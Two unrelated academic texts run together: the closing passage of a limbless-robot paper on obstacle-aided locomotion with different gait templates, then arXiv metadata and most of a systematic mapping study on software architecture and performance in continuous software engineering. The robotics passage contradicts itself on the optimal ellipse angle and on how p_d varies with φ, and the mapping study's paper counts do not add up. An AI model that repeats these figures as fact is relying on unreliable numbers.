contact duration (Fig. 8) and \(T\) is the gait period. We notice the contact duration in the standing-wave gait is significantly lower than the elliptical-wave and traveling-wave gaits, indicating that the standing-wave gait has the lowest duration of beneficial contact between robot and obstacle. We also measured the attack angle between the robot and the obstacle. It is defined as the angle between the head link and the obstacle at the end of the robot-obstacle interaction. As posited by [19], larger attack angle indicates greater push from the obstacle to robots. As Fig. 7: **Robophysical OAL experiments** (a) Sparsely distributed obstacles. (_a.Top_) OAL performance as a function of \(\phi\) (for fixed \(\theta=\pi/4\)). Elliptical gaits (\(\phi\sim\pi/4\)) leads to the best OAL performance. (i) Snapshots of robot execute elliptical gaits (\(\phi=\pi/4\)) among sparsely distributed obstacles. (_a.Bottom_) OAL performance as a function of \(\theta\) (for fixed \(\phi=\pi/4\)). Elliptical orientation (\(\theta=\pi/4\)) lead to the best OAL performance. (ii) Snapshots of robot execute uncoordinated elliptical gaits (\(\theta=0\)) among sparsely distributed obstacles. (b) Densely distributed obstacles. OAL performance as a function of \(\phi\). Circular gaits (\(\phi=\pi/2\)) leads to the best OAL performance. (iii) Snapshots of robot execute traveling-wave gaits (\(\phi=\pi/2\)) among densely distributed obstacles. shown in Fig. 7, the attack angles in the traveling-wave gait are significantly lower than the elliptical and standing wave gaits, indicating that the traveling wave gait can take the least advantage of the obstacle. #### Vi-C2 Varying ellipse orientation We further explore the optimal ellipse eccentricity. Consider an elliptical gait with \(\phi=\pi/4\). We define (\(\theta\)) as the angle between the long axis and the horizontal axis. We illustrate an example gait with \(\theta=\{0.45\pi,\ 0.7\pi\}\) in Fig. 5c. From our theoretical analysis (Sec. III), we predict that \(\theta=\pi/4\) can cause the optimal OAL performance. Robophysical experiments verified our prediction that \(\theta=\pi/2\) causes the best OAL performance. ### _OAL with densely distributed obstacles_ We next explore OAL among densely distributed obstacles. We constructed a densely-distributed obstacle-rich environments where robot will inevitably encounter with multiple obstacles. We tested gaits with varying \(\phi\) on densely-distributed obstacles and observed that traveling-wave gaits (\(\phi=\pi/2\)) can cause the best OAL performance (Fig. 7). We acknowledge that to effectively navigate in environments with many obstacles, sensing and/or compliance is typically required [40, 38]. Since our analysis in Sec. IV is limited to open-loop gait-level design, the large variation in our experiments is expected. To explore the physical principles behind the advantage of traveling-wave gaits, we examine the interaction profile between the robot and the obstacles. As predicted in our theoretical analysis (Sec. IV), effective OAL in traveling-wave gaits results from the combined effects of multiple obstacles restricting the lateral/oscillation of central body axis. Therefore, there is no clear definition of "beneficial" or "detrimental" obstacles in traveling-wave gaits. As illustrated in Fig. 9, interactions between the robot and obstacles are mostly perpendicular to the direction of motion (therefore considered as "neutral") in traveling-wave gaits. On the other hand, effective OAL for elliptical and standing wave relies more on the interaction with a single obstacle. Therefore, OAL performance of elliptical and standing wave are sensitive to the distribution of obstacles. Following this idea, we record the probability of robot interacting of "detrimental" obstacle (\(p_{d}\)) for traveling, elliptical, and standing gait templates. We notice that \(p_{d}\) increases as \(\phi\) increases (Fig. 9). Moreover, once interacting with the detrimental obstacles, the probability of escaping decreases as \(\phi\) decreases (Fig. 9). ## VII Discussion and Conclusion In this paper, we expanded the scope of geometric mechanics to heterogeneous environments. Specifically, we established a novel model that maps the presence of an obstacle in position space to constraints in shape space. In doing so, we illustrate that (1) there exists a threshold obstacle spacing below which OAL is likely not effective; (2) lateral forces from obstacles can also contribute to forward displacement via the Lie bracket effect; (3) elliptical-wave gaits (\(\phi=\pi/4\), \(\theta=\pi/4\)) are specialized for locomotion among sparsely-distributed obstacles; and (4) traveling-wave gaits (\(\phi=\pi/2\)) are specialized for locomotion among densely-distributed obstacles. Our predictions are verified in robophysical experiments. This paper focused on the open-loop gait-level design for OAL. We acknowledge that gait-level design is in general not sufficient for effective OAL, especially among densely Fig. 8: **Advantage of elliptical gaits** (a) Snapshots of robots executing (_top_) standing wave, (_mid_) elliptical wave, and (_bottom_) traveling wave locomotion among sparsely-distributed obstacles. Attack angle and contact duration are labelled. (b) (_top_) Attack angle as a function of \(\phi\). Traveling wave (\(\phi=\pi/2\)) have significantly lower attack angle than standing wave (\(\phi=0\)) and elliptical wave (\(\phi=\pi/4\)). (_Bottom_) Contact fraction as a function of \(\phi\). Standing wave have significantly lower attack angle than traveling wave and elliptical wave. Fig. 9: **Beneficial obstacles.** (_Left_) Snapshots of traveling wave (_top_) and standing wave (_bottom_) locomotion among densely-distributed obstacles. Beneficial, detrimental, and neutral obstacles are labeled. (_Right_) \(p_{d}\), the probability of encountering detrimental obstacles, plotted as a function of \(\phi\). \(p_{d}\) decreases as \(\phi\) increases. distributed obstacles. However, we believe that proper gait design can simplify necessary controls (e.g., passive body dynamics Wang et al. [42] and sensor-based feedback controls) for OAL. In concurrent work, it is illustrated that with the help of passive body dynamics, our framework helps facilitate effective OAL in various obstacle-rich environments. Apart from forward locomotion, our framework can also apply to studying turning behavior in obstacle-rich environments. For example, prior work indicates that the omega turn [39] emerges to be a robust turning gait, especially in obstacle-rich environments; Wang et al. [41] show that the presence of obstacles can even aid turning behaviors in limbless robots. We suspect that omega turn gaits can benefit from interaction with obstacles because of the kinematic properties of their gait trajectories. In future work, we aim to use our OAL framework to analyze the turning behaviors in limbless robots. In doing so, our framework paves the way toward machines that can traverse complex environments and facilitates understanding of biological locomotion.
2304.02489
Architectural Support for Software Performance in Continuous Software Engineering: A Systematic Mapping Study
The continuous software engineering paradigm is gaining popularity in modern development practices, where the interleaving of design and runtime activities is induced by the continuous evolution of software systems. In this context, performance assessment is not easy, but recent studies have shown that architectural models evolving with the software can support this goal. In this paper, we present a mapping study aimed at classifying existing scientific contributions that deal with the architectural support for performance-targeted continuous software engineering. We have applied the systematic mapping methodology to an initial set of 215 potentially relevant papers and selected 66 primary studies that we have analyzed to characterize and classify the current state of research. This classification helps to focus on the main aspects that are being considered in this domain and, mostly, on the emerging findings and implications for future research
Romina Eramo, Michele Tucci, Daniele Di Pompeo, Vittorio Cortellessa, Antinisca Di Marco, Davide Taibi
2023-04-05T15:03:06Z
http://arxiv.org/abs/2304.02489v1
# Architectural Support for Software Performance ###### Abstract The continuous software engineering paradigm is gaining popularity in modern development practices, where the interleaving of design and runtime activities is induced by the continuous evolution of software systems. In this context, performance assessment is not easy, but recent studies have shown that architectural models evolving with the software can support this goal. In this paper, we present a mapping study aimed at classifying existing scientific contributions that deal with the architectural support for performance-targeted continuous software engineering. We have applied the systematic mapping methodology to an initial set of 215 potentially relevant papers and selected \(66\) primary studies that we have analyzed to characterize and classify the current state of research. This classification helps to focus on the main aspects that are being considered in this domain and, mostly, on the emerging findings and implications for future research. keywords: Software Architecture, Software Performance, Continuous Software Engineering, DevOps + Footnote †: journal: Journal of Systems and Software ## 1 Introduction Continuous software engineering (CSE) is a promising software process that interleaves business strategy (i.e., requirement engineering), development, and operations on a continuum. It aims to produce a better software product and create more successful implementations that satisfy the relevant requirements and constraints. Similarly, the recent emphasis on DevOps recognizes that the integration between software development and its operational distribution must be continuous. DevOps improves end-to-end collaboration between the stakeholders, development, and operations teams. In addition, they have been successfully employed in disciplines such as security and testing. Software performance (SP) is an essential quality aspect for the adoption and success of a software system. Researchers and industry practitioners have identified the importance of integrating performance engineering practices in continuous development processes in a timely and efficient way [1]. However, current software performance engineering methods are not tailored for environments using CSE processes and practices are lagging [2; 3]. Although SP is a non-functional property related to the platform on which the software is deployed, performance assessment, in the last two decades, has been mainly estimated at the design level through methods, such as software architecture (SA) [4; 5; 6]. SAs can be transformed into performance models, whose indices can be exploited to compare SA alternatives. Such a design-time performance assessment does not extensively consider several aspects of the target platform characteristics. However, these early-stage comparative analyses that show differences evident in the alternative results certainly support architects to make decisions with an enhanced view of their performance effects. The rise of the continuous engineering paradigm has substantially changed in the last decade of the software process. More often, it is nowadays required that software engineering follows a continuous loop between the running code and design models such that these two sides of the process can reciprocally feed each other [7]. For example, runtime data can be collected from execution traces to feed software models. Software models are then aimed at checking either functional or non-functional properties. The analysis of software models in the context of incoming execution scenarios can suggest just-in-time refactoring/adaptation actions that keep the software behavior acceptable when these scenarios occur [8; 9; 10]. In the context of CSE processes, architectural models appear to have gained relevance, among others, for supporting performance-related decisions [11]. Despite rising interest in embracing the continuous architect ing approaches and performance engineering practices, there has been a little consensus in the literature on the appropriateness of different performance engineering techniques that can be used in a continuous engineering process. A limited number of studies that consider continuous engineering in some specific aspects of self-adaptive systems and microservices have been published [12; 13; 14; 15; 16]. However, current CSE and DevOps practices focus on rapid delivery, minimizing time to release for new features, mitigating risks, driving new efficiencies, and establishing a continuous delivery pipeline. Efficient and automated performance engineering tools are critical and pose relevant challenges in accomplishing this mission. Thus, there is still a need for a study that systematically investigates all the key publications on this topic and identifies possible performance engineering techniques applicable to continuous engineering processes. In this study, we conduct a mapping study of the existing literature [17] to investigate the contributions of the scientific community to architectural support for SP within CSE. Furthermore, the study aims to characterize and classify the current research scenario to better structure our understanding of the topic and identify research directions worth investigating in this domain soon. The main contributions of this study include: * A reusable framework for classifying, comparing, and evaluating solutions, methods, and techniques specific to architectural support for software performance in continuous software engineering; * A systematic map of the state of research in the domain of architectural support for SP in CSE in terms of the performance areas, domains, addressed problems, and adopted instruments; * A discussion of the emerging trends, gaps in the literature, and their implications for future research. The remainder of this paper is organized as follows: In Section 2, we provide a background review and compare the existing literature. In Section 3, we define our target question and illustrate the process that we have adopted to conduct the mapping study; In Sections 4-8, we describe and analyze the results obtained to answer our target questions. In Section 9, we discuss the threats to validity of our study, and finally, Section 10 presents the concluding remarks. ## 2 Background and Related Work This section provides some background information and presents the synergies among the main concepts involved; other studies on related topics are also presented in this section. ### Main concepts **Continuous Software Engineering (CSE)**. This refers to the capability to develop, release, and learn from software in rapid parallel cycles. This includes determining new functionality to build, evolve and refactor the architecture, develop the functionality, validate it, release it to customers and collect experimental feedback from the customers to inform the next cycle of development [18]. The definition of CSE is prone to interpretations and is often used in conjunction with other continuous activities that emerge during the entire software (engineering) lifecycle [7]. In particular, the activities considered in the _development_ phase are: continuous integration, continuous deployment/release, continuous delivery, and continuous verification/testing. Whereas, the _operation_ phase concerns the end of the process, where handover of the release is initiated; in this phase, particular attention is devoted to the continuous use of these systems, after the initial adoption, as well as continuous monitoring, to observe and detect compliance issues and risks. The most recent stand out of the _DevOps_[19] practices, which promote the integration between development and operations, confirms that these areas are closely interact to achieve CSE. Finally, a closer and continuous linkage between business management and software development functions is also necessary to benefit activities such as business planning; the _BizDev_[7] phenomenon complements DevOps, integrating business management with software development and operations functions. **Software Performance (SP)**. This represents the entire collection of software engineering activities and related analyses used throughout the software development cycle, which are directed at meeting performance requirements [20]. This field focuses on the quantitative evaluation of modern software systems (e.g., data-intensive, autonomous, distributed, adaptive, and embedded systems) and trade-offs between performance and other quality of service (QoS) attributes (e.g., security, reliability, and availability). In the last few decades, numerous performance engineering methods, methodologies, and techniques have been developed for system evaluation [21]. SP assessment is a crucial task in software engineering to ensure that a new software release does not impair the user-perceived performance. Performance degradation can occur in various forms, such as high response time latency, low throughput, and excessive resource utilization. Although these arguments would suggest that performance should be assessed on every change, recent studies on continuous engineering shows that it is not standard practice yet [22]. **Software Architecture (SA)**. The SA of a software system is the structure or structures of the system, which comprise software components, the externally visible properties of those components, and the relationships among them [23]. SA is often the first design artifact to represent decisions on how the requirements of all types are to be achieved. It shows the correspondence between the requirements and the constructed system, thereby providing a rationale for the design decisions [24]. The design of the overall system structure, particularly in large and complex systems, is an essential factor. For instance, performance depends largely upon the complexity of the required communication, coordination, or cooperation among the different components, particularly in complex distributed systems. The need for SA evaluation is based on the realization that software development, similar to all engineering disciplines, is a process of continuous modeling and refinement. Detecting architectural problems before the bulk of the development work is completed allows re-architecting activities to take place in due time without to rework what has already been done. At the same time, tuning activities enhance and maintain the SP during the software lifetime [25]. **Synergies between CSE, SP, and SA.** CSE involves several challenges in terms of SA evolution and the detection/resolution of problems related to software quality attributes, such as performance [7]. Software development, in practice, concerns the continuous evolution of software, primarily owing to new incoming requirements. It is possible that SA is not adequate to embed new required functionalities, thus imposing a heavy and complex software evolution. This is compounded by situations in which the original developers are no longer available. In such cases, the system maintainability is strongly related to its architecture [26]. With continuous engineering practices, developers have greater control and visibility of defects and to access the quality attributes states, enabling them to remedy any potential issues during the system development. Interactions between designing and run-time in software engineering allow for dynamic adaptation and ensure non-functional properties and end-user expectations [27]. Notably, continuous monitoring is considered an enabler for the early detection of QoS problems, such as performance degradation [28]. Figure 1 illustrates the context of this study. We considered the holistic view of the CSE proposed in [7] and tailored the figure by focusing only on the continuous activities that are central to SP (in the white rectangles) and by adding the specific task of performance assessment (in the light blue rectangle). This figure also shows the bridge artifacts between CSE and SP. SA and runtime data are output artifacts of CSE that feed THE SP, whereas refactoring enters the CSE. SA is the abstraction that represents the best trade-off between model complexity and expressiveness and allows the assessment of the performance characteristics of a (software) system. Runtime data represents the running system that provides all parameters to set the performance model defined by the SA. Refactoring consists of suggestions on how to change the software system to solve or mitigate performance degradation. Based on the above tailoring, we formulate a query to extract the literature object of our analysis. ### Related works In this section, we discuss secondary studies that somehow address the role of SA and SP in the CSE paradigm. Koziolek [12] conducted a holistic literature review classifying the approaches concerning performance prediction and measurement for component-based software systems based on studies published from 1999 to 2009. These approaches introduce specialised modelling languages for the performance of software components and aim to understand the performance of a designed architecture instead of code-centric performance fixes. The review acknowledges the limited support for the runtime life-cycle stage of software components and the lack of consensus on the performance modeling language. In fact, none of the reviewed approaches was ready to gain widespread use due to limited tool support, fundamental in the case of CSE. The surveyed methods support modelling the runtime life-cycle stage of software components only in a limited way (i.e., they only included the workload and the usage profile modeling of the component-based system at runtime). For continuous performance improvement, dynamic software refactoring is of paramount importance. However, the reviewed primary studies in [12] partially supported dynamic and automated mechanisms for CSE for performance aspects. Furthermore, online performance monitoring at runtime was not fully combined with modelling techniques to react on changing usage profiles and deployment environments. As an extension of the review published by Koziolek [12], we present an updated analysis of the literature in our study including papers published until February 2022. Differently from [12], our work focuses on publications investigating performance engineering methods that can be applied in the context of CSE and considering approaches applicable to all kind of systems without limiting our study to component-based software systems. In a subsequent holistic literature review, Becker et al. [13] specifically investigated model-driven performance engineering approaches for self-adaptive systems based on studies published from 2004 to 2011. The authors provided a thorough classification scheme, presented as a feature diagram. They distinguished between the reactive and proactive adaptation strategies, and they derived two main categories of adaptation: design-time and run-time. Self-adaptation is the ability of the system to decide autonomously (i.e., without or with minimal human intervention) how to adapt to accommodate changes in its context and environment, and to manage the uncertainty in the environment in which the software is deployed, and during the execution [29]. Self-adaption is enabled since the self-adaptive systems use an explicit representation of their own structure, behavior, and goals [30]. Recent efforts have been devoted to investigating motivation and the application of self-adaptation in practice [31]. In this context, CSE defines a continuous engineering process needed to quickly respond to market and customer new requirements, i.e., to build solutions that much more accurately Figure 1: Overview of the considered context align with dynamic customer needs [32]. A number of continuous activities (such as continuous monitoring, continuous integration, and so on) are part of an overall CSE [33]. CSE and (self-)adaptation are two different run-time mechanisms in the sense that self-adaptation is the ability of a system to manage changes and uncertainty, while CSE is a dynamic process that continuously engineers the system allowing to add new features, functionalities, and abilities, or new smarter implementations of them. While the aforementioned study (i.e., [13]) consistently outlines performance engineering in self-adaptation targeting model-driven performance approaches, we seek to extend the area of interest to a more general interleaving of runtime knowledge and architectural models in CSE, without limiting the study to model-driven performance approaches. Recently, different studies have covered the different aspects of CSE [14; 15; 16] in several contexts. However, differently from our work, they did not specifically consider SP engineering. Pahl et al. [14] have presented a systematic mapping study of 21 papers published from 2014 to 2015 to identify, taxonomically classify, and systematically compare the existing research body on microservices and their application in the cloud, by positioning them within the context of continuous development. Taibi et al. [15] have presented a systematic mapping study of continuous architecture with microservices and DevOps, and included 23 studies published from 2014 to 2017 in their investigation. They provided an overview of the architectural styles of microservices applications, highlighting the advantages and disadvantages of each style. However, no consideration was given to non-functional properties, such as performance. Jabbari et al. [16] presented a systematic mapping study on the classification of DevOps and included 49 papers published from 2011 to 2016. They investigated how DevOps was exploited during software development processes. They found that few primary studies exploited model-driven engineering techniques and focused on quality assurance. Finally, Bezemer et al. [34] conducted an industrial survey to gain insights into how performance is addressed in industrial DevOps settings. In particular, they have investigated the frequency of executing performance evaluations, the tools being used, the granularity of the performance data obtained, and the use of model-based techniques. In contrast to the aforementioned papers, in this paper, we execute a systematic mapping study that investigates how performance is assessed in the context of CSE by providing a classification schema able to classify primary studies concerning research areas, addressed target problems, provided contributions, devised methodologies, studied performance indices, and type of used data. Unlike other related work, the focus of this study is the combination of SA and SP within CSE. ## 3 Research Method To gain insights into the current research practices on the architectural support for SP within CSE, we conducted a systematic mapping study of the literature based on the guidelines proposed by Petersen et al. [17], and the "snowballing" process defined by Wohlin [35]. The process adopted in this study consists of five steps, as shown in Figure 2. In the first step, we _define the research questions_ and identify the scope of the review to be incorporated in the next steps. Subsequently, we _conduct a literature search_ to retrieve a list of relevant publications that are then selected by applying the inclusion and exclusion criteria in the _papers selection_ step. The selected publications are the input for the _data extraction_, where we categorize the relevant publications by considering their full text. As output, we obtain a classification schema that is used as input for _mapping the data retrieved from the papers_ to the questions. In the following section, we describe the five aforementioned steps of the mapping process. In Sections 4-8, we present the results of the analysis and mapping of the papers. Moreover, to simplify the replicability of this study, a complete replication package is made publicly available [36]. ### Defining research questions To investigate the contributions of the scientific community on the architectural support for SP within CSE, we formulated the following research questions: _RQ1: What **research areas** and **target systems** have been investigated?_. The aim of this research question is two-fold: _i)_ to highlight the research areas that are focused on providing solutions in this field; and _ii)_ to extract the subject systems on which the application or technique is intended to apply (we refer to this by the term "target system" [37; 38]). The rationale for this RQ is strongly related to the goal of this study and it aims to define how and what degree of performance engineering is exploited in CSE. It also determines which application domains have been considered in the selected studies. This helps us to understand the maturity of continuous performance assessment and to determine the applications for which performance is considered a key constraint. _RQ2: What and how **performance problems** have been addressed?_. This research question focuses on the identification of the SP engineering problems targeted in a CSE process and the solutions proposed to address them. Several issues can be addressed in SP engineering, including requirement specification, modeling, analysis, prediction, and suggestions to improve the software system performance. The rationale behind this RQ is strictly related to the identification of the SP target problems considered by the researchers and the related contributions proposed in the context of CSE. _RQ3: What **instruments** have been adopted?_. Several instruments can be used to address the performance issues. We partitioned these into three categories of keywords: input data, methodologies/techniques, and performance output measures/indices. The first category includes the types of data that are used to conduct the performance analysis, and spans from runtime data through requirements to software/performance models. Examples of the the second category are patterns/anti-patterns recognition, performance prediction or testing. The third category aims to identify the target metrics, such as response time, throughput and network bandwidth. This research question aims to identify which, and with what degree instruments have been applied in the context of CSE. The rationale behind this question is strictly related to determining the characteristics and limits of the proposed solutions in the SP and CSE domains. _RQ4: What are the gaps in current research **gaps** and the implications for future research?_. This research question combines the different viewpoints highlighted in the previous three RQs, and aims to identify contexts that have been hitherto most or least investigated. For example, how intensively has _performance assessment_ (as a problem) been investigated in the context of _continuous monitoring_ (as a research area) on _distributed systems_ (as a target)? We are particularly interested in highlighting combinations that exhibit low intensities. We expect that some of these combinations to raise negligible interest and others to represent research gaps. Moreover, we are focused on identifying areas worth investigating in the near future. ### Conducting search The search process involves the identification of search strings, the outline of the most relevant bibliographic sources and search terms, the definition of the inclusion and exclusion criteria, and the query execution. **Search strings**. We defined the search keywords based on the PICO1 terms [40] in our questions structure. As suggested by Kitchenham [40], the comparison and outcome terms cannot always be considered in software engineering if the research focuses on general investigation. hence, we extracted the keywords from the population and intervention terms. Footnote 1: PICO elements include: problem/patient/population, intervention/indicator, comparison, outcome [39]. We refined the search terms and the related search strings to ensure that relevant studies were returned by combining the keywords and reviewing the titles and abstracts of the search results. The final set of keywords is listed in Table 1. The resulting query was then adapted to the syntax of each bibliographic source. All the queries applied to the different bibliographic sources are reported in the replication package [36]. _("continuous software engineering" OR "continuous integration" OR "continuous deployment" OR "continuous development" OR "continuous improvement" OR DevOps OR "continuous evolution" OR "continuous monitoring") AND "software architecture" AND "software performance"_ **Bibliographic sources**. We selected a list of relevant bibliographic sources following the suggestions of Kitchenham and Charters [40], as these sources were recognized as the most representative in the software engineering domain and were used in many reviews. The list includes: _ACM Digital Library_, _IEEEXplore Digital Library_, _Scopus, and Springer Link_. **Inclusion and exclusion criteria**. We defined the inclusion and exclusion criteria to be applied to the title and abstract (T/A) or to the full text (All), as reported in Table 2. **Search**. Finally, the search was conducted on March 1st, 2022, and all the publications hitherto available were included. The application of the searching terms returned 215 papers, which was the result of merging the papers from the bibliographic sources considered, as depicted on the left side of Figure 3. Upon removing the duplicate papers, we obtained 195 papers. We validated the search string with a "golden set" of papers that ensured that we did not leave out relevant works. The papers considered in the golden list were: [SP2], [SP9], [SP10], [SP12], [SP31], and [SP49]. ### Papers selection After obtaining the initial set of papers, we applied the selection process described in this section. An overview and numbers of this process is depicted in Figure 3. **Testing the applicability of the inclusion and exclusion criteria.** Before applying the inclusion and exclusion criteria, all the authors tested their applicability iteratively, on a subset of 20 randomly selected papers. Based on the disagreements, and on a shared discussions, we clarified the inclusion and exclusion criteria. **Applying the inclusion and exclusion criteria to the title and abstract.** The refined criteria were applied to the remaining 195 papers (Table 2). We have included papers that meet all the inclusion criteria and excluded those that meet any of the exclusion criteria. Each paper was read by two authors; in the case of disagreement, a third author helped to resolve the disagreements. For 32 papers, the authors discussed and cleared possible disagreements. Out of the 195 initial papers, we included Figure 3: Overview and numbers of search and selection process Figure 2: Overview and numbers of search and selection process 74 papers based on the title and abstract. The inter-rater agreement before the third author was involved was 0.75, obtained using Cohen's kappa coefficient, which indicated a substantial agreement between the authors [41]. **Snowballing.** We performed the snowballing process [35], by considering all the references presented in the retrieved papers and evaluating all the papers referencing the retrieved papers, which resulted in one additional relevant paper. We applied the same process to papers retrieved from the initial search. A snowballing search was conducted in March 2022. We identified \(86\) potential papers, but only \(11\) were included (after applying the inclusion and exclusion criteria to the title and abstract) in order to compose the final set of publications that were subjected to full reading and data extraction. **Full reading.** The screening of the remaining \(85\) papers was performed independently by two authors. We ensured that the papers were randomly assigned such that each author had a similar number of papers assigned. Moreover, we permuted the assignments to enable a good balance between each pair. We read the \(85\) papers in full and applied the criteria defined in Table 2. To improve the reliability of our study [42], we sought the services of a third author in two papers to reach a final decision. In this case, the inter-rater agreement before the third author was involved was strong (Cohen's kappa coefficient = 0.94; almost perfect agreement). Based on this process, we selected a total of \(66\) papers for the review. ### Data Extraction and Analysis To ensure a rigorous data extraction process and to ease the management of the extracted data, a well-structured classification framework was rigorously designed, as explained in this section. To answer our RQs, we extracted a set of information from the \(66\) selected papers. Notably, we defined the main concepts and corresponding data in our study by following a systematic process called _keywording_. The goal of this process is to effectively develop a classification scheme so that it fits the selected papers and considers their research focus into account [43]. In particular, we identified the codes for our coding schema using a semi-automated process in the following two steps: 1. _Automatic identification of the most recurrent keywords in the papers_. We used natural language processing (NLP) techniques to automatically identify the keywords that were most frequently mentioned in the abstracts of the selected papers. We started by collecting the abstracts from a single dataset that constituted the text corpus for the processing. The corpus was pre-processed in two phases: _noise removal_ and _normalization_. In the _noise removal_ phase, we performed an initial clean-up by converting the text to lowercase and by removing punctuations, tags, special characters, and digits. We then applied two normalization techniques: _stemming_ to remove suffixes and _lemmatization_ to group together words having the same root. As a final pre-processing step, we removed the prepositions, pronouns, and conjunctions. Thus, we created a vector of words counts by deriving a _bag-of-words_ model for the text. In this model, words order and grammar information are not considered because the entire text is represented by the multiset of its words from which one can derive their multiplicity. The vector of words counts was then used to obtain the 50 most frequent single words and two words (bi-grams) and three words (tri-gram) combinations. 2. _Manual refinement of the keywords._ We refined our collection of keywords and concepts by reading the abstract of each paper. We combined together keywords from different papers to develop a high level understanding of the nature and contribution of the research. This helped us to define a set of categories of keywords that is representative of the research questions. However, the paper abstracts were too limited to define all meaningful keywords. \begin{table} \begin{tabular}{l l l} \hline \hline **Population** & **P Terms** & **Step** \\ \hline Software Performance & software performance & All \\ \hline \hline **Intervention** & **I Terms** & \\ \hline Software Architecture & software architecture & \\ \hline Continuous Software Engineering & DevOps, continuous integration, continuous deployment, continuous development, continuous improvement, DevOps, continuous evolution, continuous monitoring & \\ \hline \hline \end{tabular} \end{table} Table 1: Definition of keywords \begin{table} \begin{tabular}{l l l} \hline \hline **Criteria** & **Assessment Criteria** & **Step** \\ \hline \multirow{4}{*}{Inclusion} & The paper covers software performance engineering issues & All \\ \cline{2-3} & The paper proposes model-based or architectural approaches for CSE/DevOps or contributes to (self-) adaptation/refactoring targeted & All \\ \cline{2-3} & to software performance & \\ \hline \multirow{4}{*}{Exclusion} & The paper is not fully written in English & T/A \\ \cline{2-3} & The paper is not peer-reviewed (i.e., blog, forum, etc.) & T/A \\ \cline{2-3} & The paper is a duplicate (only consider the most recent version) & T/A \\ \cline{2-3} & The paper is a position papers, book chapter or work plan (i.e., the paper does not report results) & T/A \\ \cline{2-3} & The paper does not fully or partly focus on software performance & All \\ \cline{2-3} & The paper does not fully or partly focus on software architecture or software engineering & All \\ \hline \hline \end{tabular} \end{table} Table 2: Inclusion and exclusion criteria Therefore, we thoroughly examined all the sections of the papers to consolidate our classification schema. We performed a double round of reviews by shuffling reviewers (among the authors of the paper) after the first round. Finally, upon obtaining a consolidated set of keywords, we have re-organized the original categories to obtain the final classification used hereafter. We assigned each author a set of 10 randomly selected papers, to validate the coding schema and keywords, and to ensure a common understanding among the researchers. Subsequently, we discussed on the results of the coding and possible inconsistencies, and we finalized the schema. The resulting classification framework is presented in Table 3. It comprises seven categories, with groupings of pertinent extracted keywords. A detailed description of each keyword is provided in C. Each category addresses the corresponding research questions by using the metrics described in details below. For \(RQ_{1}\), we extracted the information on the research area and target system. Both research areas and targets may be either fully or partially investigated. The primary goals of a paper are included in the fully-investigated research areas and targets. In a partially-investigated research area, either the primary goals of the paper are considered, or it is a secondary area that supports the primary goals (while a partially-investigated target implies that the study can support that targeted system, even if it is not described as central in the paper). As an example, we considered papers, such as [SP40], where _continuous software engineering_ has been partially investigated because the paper mainly focuses on _software performance engineering_. It is important to note that papers might fully investigate one area and partially investigate another one, and therefore there might be more than one research area assigned to each paper. Regarding the problems addressed in the selected papers for \(RQ_{2}\), we extracted information on the primary and secondary problems and contributions reported by the selected papers. As an example, we considered _performance requirement_ as the primary problem and _quality of service_ as the secondary problem for paper [SP58], while we considered _performance analysis approach_ as main contribution and _performance modelling approach_ and _performance prediction approach_ as the secondary contributions for the paper [SP45]. The same approach was applied also for \(RQ_{3}\). After extracting all the information from the selected papers, we analyzed the data by counting the number of papers obtained for each data group and metrics (see Table 3). Therefore, for (\(RQ_{1}\)), we counted the number of papers that fully investigated a topic, partially investigated it or considered the topic (either fully or partially investigated it). Similarly, for (\(RQ_{2}\)), we counted the papers that considered each research problem (primary, secondary, or both). Following the previous approach, (\(RQ_{3}\)) was analyzed by counting the number of fully- and partially-evaluated indices, used data, and methods. For the first three RQs, we considered the individual keyword results. \(RQ_{4}\) has been introduced to observe the results across different keywords, with the goal of identifying contexts that have scarcely been investigated. To achieve this goal, we introduced bubble plots, which allowed for a straightforward comparison of how intensively a certain context was investigated in comparison to other contexts. In the plots, the size of the bubbles represents the number of papers that investigate a specific keyword at the intersection of a research area (x-axis) and domain (y-axis). The exact number of papers is annotated for each bubble. In this way, one can visually identify areas of the plot where no bubbles or only small bubbles are observed, thereby establishing combinations of research areas and target systems where a certain keyword appears to be seldom investigated in the considered literature. Moreover, we analyzed the combination of the previous results and future improvements and direction described in the selected papers to identify a set of implications for future research. A complete list of the keywords and metrics used for the analysis is presented in Table 3. ## 4 Results Overview We selected 66 peer-reviewed publications, including 21 (32.3%) articles, 30 conference papers (46.2%) and 15 workshop (or others satellite events) papers (21.5%), as shown in Figure 4. The selected papers were presented at 33 different venues. Figure 5 depicts the list of venues considered by at least two of the selected papers. The selected papers show a continuously growing interest on performance-targeted CSE between 2016 and 2022, while a very small number of publications have been published until 2015, which is in line with the fact that continuous develop Figure 4: Selected paper types. Figure 5: Selected paper per venues. ment and DevOps have emerged only recently [7]. Thus, we can gather that the intuition of supporting SP through continuous engineering solutions has been strengthened since 2015, although there has been a decrease in the number of publications in 2020 and 2021. The cumulative number of citations per year for the primary studies (Figure 6, blue line, source: Google Scholar) highlights that the growing interest concerns not only the publications but also the number of citations obtained from the studies of the dataset. Moreover, citations have grown rapidly since 2016. It is worth noting that the entire dataset has a total of more than 3000 citations to date (i.e., they have more than doubled in the last six years). This result indicates an important growing interest in the context of this study. Thus, although the DevOps and CSE domains are relatively young compared with performance engineering, significant contributions have been made in the last ten years and researchers are becoming increasingly active (Figure 6). In the followin section, we present the results of this study aimed at answering our research questions (see Section 3.1). For each extracted piece of information, we report both the quantitative data and an interpretation of the results obtained. ## 5 What research areas and target systems have been investigated (RQ1) The topic considered combines several aspects, as we discussed in Section 2, which may attract interest from different disciplines and for different scopes of research. To provide an overview of this research topic, we describe the research areas focused on providing solutions and the target systems for which solutions have been developed. ### Research areas Figure 7 depicts the principal **research areas** that are focus areas of the selected papers (each study may contribute to more than one area). The bar chart in the figure compares the identified research areas with respect to the number of papers. Although our topic is characterized by the dimensions showed in this figure, the fact that the selected papers contribute to these specific fields of research is not obvious. For instance, a paper Figure 6: Cumulative number of primary studies and citations in each year, and by type of publication. \begin{table} \begin{tabular}{c c c} \hline \hline **RQ** & **Categories** & **Keywords** & **Metrics** \\ \hline \multirow{6}{*}{RQ1} & \multirow{6}{*}{Research area} & Software performance engineering, Software architecture, & \\ & & Continuous Software Engineering, DevOps, & \\ & & Continuous Monitoring, Agile software development. & \#Fully investigated topics (F) \\ \cline{2-3} & \multirow{6}{*}{Target system} & Embedded / CPS, Cloud, Real-time, & \#Partially investigated topics (P) \\ & & Distributed, Data intensive & \#Investigated topics (F, P) \\ & & Software intensive, & \\ & & Component-based software / Microservices / SOA. & \\ \hline \multirow{6}{*}{RQ2} & \multirow{6}{*}{Research problems} & Performance evaluation/assessment, & \\ & & Performance requirement, Quality of service, & \#Main target \\ & & Resource allocation / deployment, Uncertainty. 